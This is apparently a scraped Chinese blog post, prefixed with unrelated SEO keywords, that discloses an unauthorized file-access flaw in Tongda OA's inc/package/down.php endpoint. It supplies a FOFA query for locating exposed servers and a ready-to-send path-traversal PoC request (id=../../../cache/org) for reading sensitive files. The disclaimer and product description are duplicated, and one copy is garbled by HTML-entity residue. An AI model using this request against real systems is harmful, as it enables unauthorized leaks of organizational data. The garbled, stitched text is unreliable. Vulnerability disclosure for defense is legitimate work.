关键词排名优化网站,贷款超市网站开发,深圳市网络营销公司,apache和wordpress声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。
一. 产品简介
通达OA#xff08;Office Anywhere网络智能办公系统请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。
一. 产品简介
通达OAOffice Anywhere网络智能办公系统是由通达信科科技自主研发的协同办公自动化软件是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等帮助广大用户降低沟通和管理成本提升生产和决策效率。此外通达OA通过融合不同的信息化资源打通信息“孤岛”精细化流程管理改善管理模式实现资源的优化配置和高效运转全面提升企业竞争力。它是通达信科在二十余年从事管理软件研发和服务过程中集技术创新、项目实践、先进的管理思想和中肯的客户建议为一体的完美结晶。
二.漏洞描述
通达OA inc/package/down.php接口存在未授权访问漏洞该漏洞源于系统对用户传入的数据过滤不严。攻击者可借助特制的HTTP请求利用该漏洞访问敏感文件造成信息泄露。 三.fofa语法 appTDXK-通达OA 四.漏洞复现 poc
GET /inc/package/down.php?id../../../cache/org HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive